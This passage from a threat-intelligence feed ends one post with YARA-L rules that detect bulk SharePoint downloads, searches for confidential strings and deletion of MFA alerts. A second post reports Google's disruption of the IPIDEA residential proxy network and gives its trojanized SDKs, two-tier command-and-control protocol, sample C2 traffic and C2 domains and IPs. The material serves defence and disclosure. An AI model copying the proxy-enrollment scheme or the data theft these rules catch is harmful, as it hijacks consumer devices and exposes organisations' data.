window.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> Burst volume may indicate scripted retrieval, which may also be generated by legitimate backup processes.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">FileDownloaded</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Filtering on common document file types (e.g., PDF) </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Number of downloads in window</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Minimum unique file types</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.vendor_name = "Microsoft" $e.metadata.product_event_type = "FileDownloaded" $e.target.application = "SharePoint" $e.target.file.full_path = /\.(doc[mx]?|xls[bmx]?|ppt[amx]?|pdf)$/ nocase) $file_extension_extract = re.capture($e.target.file.full_path, `\.([^\.]+)$`) $session_id = $e.network.session_id match: $session_id over 5m outcome: $target_url_count = count_distinct(strings.coalesce($e.target.file.full_path)) $extension_count = count_distinct($file_extension_extract) condition: $e and $target_url_count &gt;= 50 and $extension_count &gt;= 3</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">M365 SharePoint: Query for Strings of Interest</span></h5> <p><span style="vertical-align: baseline;">Detects SharePoint queries for files relating to strings of interest, such as sensitive documents, clear-text credentials, and proprietary information.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> Multiple searches for strings of interest by a single account occurs infrequently. Generally, users will search for project or task specific strings rather than general labels (e.g., “confidential”).</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SearchQueryPerformed</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Filtering on strings commonly associated with sensitive or privileged information </span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.vendor_name = "Microsoft" $e.metadata.product_event_type = "SearchQueryPerformed" $e.target.application = "SharePoint" $e.additional.fields["search_query_text"] = /\bpoc\b|proposal|confidential|internal|salesforce|vpn/ nocase condition: $e</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">M365 Exchange Deletion of MFA Modification Notification Email</span></h5> <p><span style="vertical-align: baseline;">Detects deletion actions targeting Okta and other platform security notification emails (e.g., “Security method enrolled”).</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> Targeted deletion of security notifications can be intentional evasion and is not typically performed by email users.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">M365 Exchange audit log delete/permanent delete (or mailbox cleanup) event</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Subject matches a small set of security-notification strings</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Time correlation: deletion shortly after receipt (optional)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.vendor_name = "Microsoft" $e.target.application = "Exchange" $e.metadata.product_event_type = /^(SoftDelete|HardDelete|MoveToDeletedItems)$/ nocase $e.network.email.subject = /new\s+(mfa|multi-|factor|method|device|security)|\b2fa\b|\b2-Step\b|(factor|method|device|security|mfa)\s+(enroll|registered|added|change|verify|updated|activated|configured|setup)/ nocase // filtering specifically for new device registration strings $e.network.email.subject = /enroll|registered|added|change|verify|updated|activated|configured|setup/ nocase // tuning out new device logon events $e.network.email.subject != /(sign|log)(-|\s)?(in|on)/ nocase condition: $e</code></pre></div>Fri, 30 Jan 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas/Mandiant https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction </span></h3> <p><span style="vertical-align: baseline;">This week Google and partners took action to disrupt what we believe is one of the largest residential proxy networks in the world, the IPIDEA proxy network. IPIDEA’s proxy infrastructure is a little-known component of the digital ecosystem leveraged by a wide array of bad actors.</span></p> <p><span style="vertical-align: baseline;">This disruption, led by Google Threat Intelligence Group (GTIG) in partnership with other teams, included three main actions:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Took legal action to take down domains used to control devices and proxy traffic through them.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Shared technical intelligence on discovered IPIDEA software development kits (SDKs) and proxy software with platform providers, law enforcement, and research firms to help drive ecosystem-wide awareness and enforcement. These SDKs, which are offered to developers across multiple mobile and desktop platforms, surreptitiously enroll user devices into the IPIDEA network. Driving collective enforcement against these SDKs helps protect users across the digital ecosystem and restricts the network's ability to expand.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">These efforts to help keep the broader digital ecosystem safe supplement the protections we have to safeguard Android users on certified devices. We ensured Google Play Protect, Android’s built-in security protection, automatically warns users and removes applications known to incorporate IPIDEA SDKs, and blocks any future install attempts.</span></p> </li> </ol> <p><span style="vertical-align: baseline;">We believe our actions have caused significant degradation of IPIDEA’s proxy network and business operations, </span><strong style="vertical-align: baseline;">reducing the available pool of devices for the proxy operators by millions.</strong><span style="vertical-align: baseline;"> Because proxy operators share pools of devices using reseller agreements, we believe these actions may have downstream impact across affiliated entities.</span></p> <h3><span style="vertical-align: baseline;">Dizzying Array of Bad Behavior Enabled by Residential Proxies</span></h3> <p><span style="vertical-align: baseline;">In contrast to other types of proxies, residential proxy networks sell the ability to route traffic through IP addresses owned by internet service providers (ISPs) and used to provide service to residential or small business customers. By routing traffic through an array of consumer devices all over the world, attackers can mask their malicious activity by hijacking these IP addresses. This generates significant challenges for network defenders to detect and block malicious activities.</span></p> <p><span style="vertical-align: baseline;">A robust residential proxy network requires the control of millions of residential IP addresses to sell to customers for use. IP addresses in countries such as the US, Canada, and Europe are considered especially desirable. To do this, residential proxy network operators need code running on consumer devices to enroll them into the network as </span><span style="font-style: italic; vertical-align: baseline;">exit nodes. </span><span style="vertical-align: baseline;">These devices are either pre-loaded with proxy software or are joined to the proxy network when users unknowingly download trojanized applications with embedded proxy code. Some users may knowingly install this software on their devices, lured by the promise of “monetizing” their spare bandwidth. When the device is joined to the proxy network, the proxy provider sells access to the infected device’s network bandwidth (and use of its IP address) to their customers. </span></p> <p><span style="vertical-align: baseline;">While operators of residential proxies often extol the privacy and freedom of expression benefits of residential proxies, Google Threat Intelligence Group’s (GTIG) research shows that these proxies are overwhelmingly misused by bad actors. IPIDEA has become notorious for its role in facilitating several botnets: its software development kits played a key role in adding devices to the botnets, and its proxy software was then used by bad actors to control them. This includes the </span><a href="https://blog.google/innovation-and-ai/technology/safety-security/google-taking-legal-action-against-the-badbox-20-botnet/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">BadBox2.0 botnet we took legal action against</span></a><span style="vertical-align: baseline;"> last year, and the Aisuru and Kimwolf botnets more recently. We also observe IPIDEA being leveraged by a vast array of espionage, crime, and information operations threat actors. In a single seven day period in January 2026, GTIG observed over 550 individual threat groups that we track utilizing IP addresses tracked as IPIDEA exit nodes to obfuscate their activities, including groups from China, DPRK, Iran and Russia. The activities included access to victim SaaS environments, on-premises infrastructure, and password spray attacks. Our research has found significant overlaps between residential proxy network exit nodes, likely because of reseller and partnership agreements, making definitive quantification and attribution challenging. </span></p> <p><span style="vertical-align: baseline;">In addition, residential proxies pose a risk to the consumers whose devices are joined to the proxy network as exit nodes. These users knowingly or unknowingly provide their IP address and device as a launchpad for hacking and other unauthorized activities, potentially causing them to be flagged as suspicious or blocked by providers. </span><span style="vertical-align: baseline;">Proxy applications also </span><a href="https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">introduce security vulnerabilities</span></a><span style="vertical-align: baseline;"> to consumers’ devices and home networks. When a user’s device becomes an exit node, network traffic that they do not control will pass through their device.</span><span style="font-style: italic; vertical-align: baseline;"> </span><span style="vertical-align: baseline;">This means bad actors can access a user’s </span><span style="font-style: italic; vertical-align: baseline;">private devices</span><span style="vertical-align: baseline;"> on the same network, effectively exposing security vulnerabilities to the internet. GTIG’s analysis of these applications confirmed that IPIDEA proxy did not solely route traffic </span><span style="font-style: italic; vertical-align: baseline;">through</span><span style="vertical-align: baseline;"> the exit node device, they also sent traffic </span><span style="font-style: italic; vertical-align: baseline;">to</span><span style="vertical-align: baseline;"> the device, in order to compromise it. While proxy providers may claim ignorance or close these security gaps when notified, enforcement and verification is challenging given intentionally murky ownership structures, reseller agreements, and diversity of applications.</span></p> <h3><span style="vertical-align: baseline;">The IPIDEA Proxy Network</span></h3> <p><span style="vertical-align: baseline;">Our analysis of residential proxy networks found that many well-known residential proxy brands are not only related but are controlled by the actors behind IPIDEA. This includes the following ostensibly independent proxy and VPN brands: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">360 Proxy (360proxy\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">922 Proxy (922proxy\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">ABC Proxy (abcproxy\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Cherry Proxy (cherryproxy\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Door VPN (doorvpn\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Galleon VPN (galleonvpn\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">IP 2 World (ip2world\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ipidea (ipidea\.io)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Luna Proxy (lunaproxy\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">PIA S5 Proxy (piaproxy\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">PY Proxy (pyproxy\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Radish VPN (radishvpn\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Tab Proxy (tabproxy\.com)</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The same actors that control these brands also control several domains related to Software Development Kits (SDKs) for residential proxies. These SDKs are not meant to be installed or executed as standalone applications, rather they are meant to be embedded into existing applications. The operators market these kits as ways for developers to monetize their applications, and offer Android, Windows, iOS, and WebOS compatibility. Once developers incorporate these SDKs into their app, they are then paid by IPIDEA usually on a per-download basis.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/disruption-proxy-network-fig1.max-1000x1000.png" alt="Advertising from PacketSDK, part of the IPIDEA proxy network"> </a> <figcaption class="article-image__caption "><p data-block-key="xqe5b">Figure 1: Advertising from PacketSDK, part of the IPIDEA proxy network</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Once the SDK is embedded into an application, it will turn the device it is running on into an exit node for the proxy network in addition to providing whatever the primary functionality of the application was. These SDKs are the key to any residential proxy network—the software they get embedded into provides the network operators with the millions of devices they need to maintain a healthy residential proxy network. </span></p> <p><span style="vertical-align: baseline;">While many residential proxy providers state that they source their IP addresses ethically, our analysis shows these claims are often incorrect or overstated. Many of the malicious applications we analyzed in our investigation did not disclose that they enrolled devices into the IPIDEA proxy network. Researchers have previously found uncertified and off-brand Android Open Source Project devices, such as television set top boxes, with</span> <a href="https://www.humansecurity.com/wp-content/themes/human/hubspot/hubfs/HUMAN_Report_BADBOX-and-PEACHPIT.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">hidden residential proxy payloads</span></a><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">The following SDKs are controlled by the same actors that control the IPIDEA proxy network:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Castar SDK (castarsdk\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Earn SDK (earnsdk\.io)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Hex SDK (hexsdk\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Packet SDK (packetsdk\.com)</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Command-and-Control Infrastructure</span></h3> <p><span style="vertical-align: baseline;">We performed static and dynamic analysis on software that had SDK code embedded in it as well as standalone SDK files to identify the command-and-control (C2) infrastructure used to manage proxy exit nodes and route traffic through them. From the analysis we observed that EarnSDK, PacketSDK, CastarSDK, and HexSDK have significant overlaps in their C2 infrastructure as well as code structure.</span></p> <h4><span style="vertical-align: baseline;">Overview</span></h4> <p><span style="vertical-align: baseline;">The infrastructure model is a two-tier system: </span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Tier One: Upon startup, the device will choose from a set of domains to connect to. The device sends some diagnostic information to the Tier One server and receives back a data payload that includes a set of Tier Two nodes to connect to.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Tier Two: The application will communicate directly with an IP address to periodically poll for proxy tasks. When it receives a proxy task it will establish a new dedicated connection to the Tier Two IP address and begin proxying the payloads it receives.</span></p> </li> </ol></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/disruption-proxy-network-fig2.max-1000x1000.png" alt="infrastructure model"> </a> <figcaption class="article-image__caption "><p data-block-key="nhxmt">Figure 2: Two-tier C2 system</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Tier One C2 Traffic</span></span></h4> <p><span style="vertical-align: baseline;">The device diagnostic information can be sent as HTTP GET query string parameters or in the HTTP POST body, depending on the domain and SDK. The payload sent includes a </span><code style="vertical-align: baseline;">key</code><span style="vertical-align: baseline;"> parameter, which may be a customer identifier used to determine who gets paid for the device enrollment.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>os=android&amp;v=1.0.8&amp;sn=993AE4FE78B879239BDC14DFBC0963CD&amp;tag=OnePlus8Pro%23*%2311%23*%2330%23*%23QKR1.191246.002%23*%23OnePlus&amp;key=cskfg9TAn9Jent&amp;n=tlaunch</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 3: Sample device information send to Tier One server</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The response from the Tier One server includes some timing information as well as the IP addresses of the Tier Two servers that this device should periodically poll for tasking.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{"code":200,"data":{"schedule":24,"thread":150,"heartbeat":20,"ip":[redacted],"info":"US","node":[{"net_type":"t","connect":"49.51.68.143:1000","proxy":"49.51.68.143:2000"},{"net_type":"t","connect":"45.78.214.188:800","proxy":"45.78.214.188:799"}]}</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 4: Sample response received from the Tier One Server</span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Tier Two C2 Traffic</span></h4> <p><span style="vertical-align: baseline;">The Tier Two servers are sent as </span><code style="vertical-align: baseline;">connect</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">proxy</code><span style="vertical-align: baseline;"> pairs. In all analyses the pairs have been IP addresses, not domains. In our analysis, the pairs are the same IP address but different ports. The </span><code style="vertical-align: baseline;">connect</code><span style="vertical-align: baseline;"> port is used to periodically poll for new proxy tasking. This is performed by sending TCP packets with encoded JSON payloads.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{"name": "0c855f87a7574b28df383eca5084fcdc", "o": "eDwSokuyOuMHcF10", "os": "windows"}</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 5: Sample encoded JSON sent to Tier Two connect port</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When the Tier Two server has traffic to route to the device, it will respond back with the FQDN to proxy traffic to as well as a connection ID.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>www.google.com:443&amp;c8eb024c053f82831f2738bd48afc256</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 6: Sample proxy tasking from the Tier Two server</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The device will then establish a connection to the </span><code style="vertical-align: baseline;">proxy</code><span style="vertical-align: baseline;"> port of the same Tier Two server and send the connection ID, indicating that it is ready to receive data payloads.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>8a9bd7e7a806b2cc606b7a1d8f495662|ok</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 7: Sample data sent from device to the Tier Two proxy port</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Tier Two server will then immediately send data payloads to be proxied. The device will extract the TCP data payload, establish a socket connection to the specified FQDN and send the payload, unmodified, to the destination. </span></p> <h3><span style="vertical-align: baseline;">Overlaps in Infrastructure</span></h3> <p><span style="vertical-align: baseline;">The SDKs each have their own set of Tier One domains. This comes primarily from analysis of standalone SDK files. </span></p> <h4><span style="vertical-align: baseline;">PacketSDK</span></h4> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">http://{random}.api-seed.packetsdk\.xyz</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">http://{random}.api-seed.packetsdk\.net</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">http://{random}.api-seed.packetsdk\.io</code></p> </li> </ul> <h4><span style="vertical-align: baseline;">CastarSDK </span></h4> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">dispatch1.hexsdk\.com</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">cfe47df26c8eaf0a7c136b50c703e173\.com</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">8b21a945159f23b740c836eb50953818\.com</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">31d58c226fc5a0aa976e13ca9ecebcc8\.com</code></p> </li> </ul> <h4><span style="vertical-align: baseline;">HexSDK</span></h4> <p><span style="vertical-align: baseline;">Download requests to files from the Hex SDK website redirect to castarsdk\.com. The SDKs are exactly the same.</span></p> <h4><span style="vertical-align: baseline;">EarnSDK</span></h4> <p><span style="vertical-align: baseline;">The EarnSDK JAR package for Android has strong overlaps with the other SDK brands analyzed. Earlier published samples contained the Tier One C2 domains:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">holadns\.com</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">martianinc\.co</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">okamiboss\.com</code></p> </li> </ul> <p><span style="vertical-align: baseline;">Of note, these domains were observed as part of the BadBox2.0 botnet and were sinkholed in our earlier litigation. Pivoting off these domains and other signatures, we identified some additional domains used as Tier One C2 domains: </span></p> <ul> <li role="presentation"><code style="vertical-align: baseline;">v46wd6uramzkmeeo\.in</code></li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">6b86b273ff34fce1\.online</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">0aa0cf0637d66c0d\.com</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">aa86a52a98162b7d\.com</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">442fe7151fb1e9b5\.com</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">BdRV7WlBszfOTkqF\.uk</code></p> </li> </ul> <h4><span style="vertical-align: baseline;">Tier Two Nodes</span></h4> <p><span style="vertical-align: baseline;">Our analysis of various malware samples and the SDKs found a single shared pool of Tier Two servers. As of this writing there were approximately 7,400 Tier Two servers. The number of Tier Two nodes changes on a daily basis, consistent with a demand-based scaling system. They are hosted in locations around the globe, including the US. This indicates that despite different brand names and Tier One domains, the different SDKs in fact manage devices and proxy traffic through the same infrastructure.</span></p> <h3><span style="vertical-align: baseline;">Shared Sourcing of Exit Nodes</span></h3> <h4><span style="vertical-align: baseline;">Trojanized Software Distribution</span></h4> <p><span style="vertical-align: baseline;">The IPIDEA actors also control domains that offer free Virtual Private Network services. While the applications do seem to provide VPN functionality, they also join the device to the IPIDEA proxy network as an exit node by incorporating Hex or Packet SDK. This is done without clear disclosures to the end user, nor is it the primary function of the application.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Galleon VPN (galleonvpn\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Radish VPN (radishvpn\.com)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Aman VPN (defunct)</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Trojanized Windows Binaries</span></h4> <p><span style="vertical-align: baseline;">We identified a total of 3,075 unique Windows PE file hashes where dynamic analysis recorded a DNS request to at least one Tier One domain. A number of these hashes were for the monetized proxy exit node software, PacketShare. Our analysis also uncovered applications masquerading as OneDriveSync and Windows Update. These trojanized Windows applications were not distributed directly by the IPIDEA actors.</span></p> <h4><span style="vertical-align: baseline;">Android Application Analysis</span></h4> <p><span style="vertical-align: baseline;">We identified over 600 applications across multiple download sources with code connecting to Tier One C2 domains. These apps were largely benign in function (e.g., utilities, games, and content) but utilized monetization SDKs that enabled IPIDEA proxy behavior.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Our Actions</span></h3> <p><span style="vertical-align: baseline;">This week</span><span style="vertical-align: baseline;"> we took a number of steps designed to comprehensively dismantle as much of IPIDEA’s infrastructure as possible.</span></p> <h4><span style="vertical-align: baseline;">Protecting Devices</span></h4> <p><span style="vertical-align: baseline;">We took legal action to take down the C2 domains used by bad actors to control devices and proxy traffic. This protects consumer devices and home networks by disrupting the infrastructure at the source. </span></p> <p><span style="vertical-align: baseline;">To safeguard the Android ecosystem, we enforced our platform policies against trojanizing software, ensuring </span><a href="https://support.google.com/googleplay/answer/2812853?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Play Protect</span></a><span style="vertical-align: baseline;"> on certified Android devices with Google Play services automatically warns users and removes applications known to incorporate IPIDEA software development kits (SDKs), and blocks any future install attempts.</span></p> <h4><span style="vertical-align: baseline;">Limiting IPIDEA’s Distribution </span></h4> <p><span style="vertical-align: baseline;">We took legal action to take down the domains used to market IPIDEA’s products, including proxy software and software development kits, across their various brands.</span></p> <h4><span style="vertical-align: baseline;">Coordinating with Industry Partners </span></h4> <p><span style="vertical-align: baseline;">We’ve shared our findings with industry partners to enable them to take action as well. We’ve worked closely with other firms, including Spur and Lumen’s Black Lotus Labs to understand the scope and extent of residential proxy networks and the bad behavior they often enable. We partnered with Cloudflare to disrupt IPIDEA’s domain resolution, impacting their ability to command and control infected devices and market their products. </span></p> <h3><span style="vertical-align: baseline;">Call to Action</span></h3> <p><span style="vertical-align: baseline;">While we believe our actions have seriously impacted one of the largest residential proxy providers, this industry appears to be rapidly expanding, and there are significant overlaps across providers. As our investigation shows, the residential proxy market has become a "gray market" that thrives on deception—hijacking consumer bandwidth to provide cover for global espionage and cybercrime. More must be done to address the risks of these technologies. </span></p> <h4><span style="vertical-align: baseline;">Empowering and Protecting the Consumer</span></h4> <p><span style="vertical-align: baseline;">Residential proxies are an understudied area of risk for consumers, and more can be done to raise awareness. Consumers should be extremely wary of applications that offer payment in exchange for "unused bandwidth" or "sharing your internet." These applications are primary ways for illicit proxy networks to grow, and could open security vulnerabilities on the device’s home network. We urge users to stick to official app stores, review permissions for third-party VPNs and proxies, and ensure built-in security protections like </span><a href="https://support.google.com/googleplay/answer/2812853?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Play Protect</span></a><span style="vertical-align: baseline;"> are active.</span></p> <p><span style="vertical-align: baseline;">Consumers should be careful when purchasing connected devices, such as set top boxes, to make sure they are from reputable manufacturers. For example, to help you confirm whether or not a device is built with the official Android TV OS and Play Protect certified, our </span><a href="https://www.android.com/tv/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Android TV website</span></a><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">provides the most up-to-date list of partners. You can also take</span><span style="vertical-align: baseline;"> </span><a href="https://support.google.com/googleplay/answer/7165974" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">these steps</span></a><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">to check if your Android device is Play Protect certified.</span></p> <h4><span style="vertical-align: baseline;">Proxy Accountability and Policy Reform</span></h4> <p><span style="vertical-align: baseline;">Residential proxy providers have been able to flourish under the guise of legitimate businesses. While some providers may indeed behave ethically and only enroll devices with the clear consent of consumers, any claims of "ethical sourcing" must be backed by transparent, auditable proof of user consent. Similarly, app developers have a responsibility to vet the monetization SDKs they integrate.</span></p> <h4><span style="vertical-align: baseline;">Industry Collaboration</span></h4> <p><span style="vertical-align: baseline;">We encourage mobile platforms, ISPs, and other tech platforms to continue sharing intelligence and implementing best practices to identify illicit proxy networks and limit their harms.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, we have included a comprehensive list of indicators of compromise (IOCs) in a <a href="https://www.virustotal.com/gui/collection/2483d199f24f4272ee3fd5adde21bd745fea6aece5c96327d7bd5ba2fc8bd06c/iocs" rel="noopener" target="_blank">GTI Collection for registered users</a>.</span></p> <h4><span style="vertical-align: baseline;">Network Indicators</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; 